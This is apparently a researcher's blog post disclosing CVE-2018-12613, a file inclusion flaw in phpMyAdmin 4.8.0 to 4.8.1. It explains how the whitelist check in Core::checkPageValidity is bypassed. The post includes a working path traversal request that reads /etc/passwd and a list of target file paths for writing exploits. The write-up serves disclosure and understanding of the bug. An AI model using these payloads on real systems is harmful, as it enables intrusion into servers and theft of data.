PHPMyAdmin 4.8.0 ~ 4.8.1 Remote Code Execution

Henry Huang
Jun 29, 2018 · 2 min read

TL;DR

I discovered a file inclusion vulnerability in index.php from PMA 4.8.0 ~ 4.8.1, and it is assigned CVE-2018–12613. It is caused by a validation bypass in the vulnerable path checking function Core::checkPageValidity. This vulnerability enables an authenticated remote attacker to execute arbitrary PHP code on the server.

Vulnerability Explained

There is a file inclusion in index.php:

if (! empty($_REQUEST['target'])
&& is_string($_REQUEST['target'])
&& ! preg_match('/^index/', $_REQUEST['target'])
&& ! in_array($_REQUEST['target'], $target_blacklist)
&& Core::checkPageValidity($_REQUEST['target'])
) {
include $_REQUEST['target'];
exit;
}
// ...
public static function checkPageValidity(&$page, array $whitelist = [])
{
// ...
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
// $whitelist == array('db_datadict.php', 'sql.php', ...)
if (in_array($_page, $whitelist)) {
return true;
}
// ...
return false;
}

Attack

Now, since we have complete control over $page, which comes directly from $_REQUEST['target'], we can set it to:

$page = 'sql.php?/../../../etc/passwd'
  1. Check if $_page, i.e. 'sql.php', is in whitelist? YES
include $_REQUEST['target'];
GET /index.php?target=sql.php%3f/../../etc/passwd
  • Core::checkPageValidity strips everything behind ? and finds sql.php within whitelist: check is bypassed!
  • index.php runs include 'sql.php?/../../etc/passwd', and PHP has this magic to convert the path to ../etc/passwd, without checking if the directorysql.php? exists or not. Finally, it includes ../etc/passwd successfully.

Ideas for Exploit Writing

To write an exploit, you can enumerate file paths like:

  • ../../etc/passwd
  • ../windows/win.ini
  • ../../windows/win.ini

Root Cause: Inconsistency

The root cause is the inconsistency between the checked path and the actual path for inclusion. The checked path should be used AS the actual path for inclusion, otherwise the check function might be bypassed or exploited.

Disclosure

I reported this vulnerability to SSD, and they went through the whole responsible disclosure process with phpmyadmin, many thanks to them!!

Bug Clash

Interestingly, ChaMd5 found the same vulnerability almost at the same time, and they wrote a pretty good write-up, too!

Reference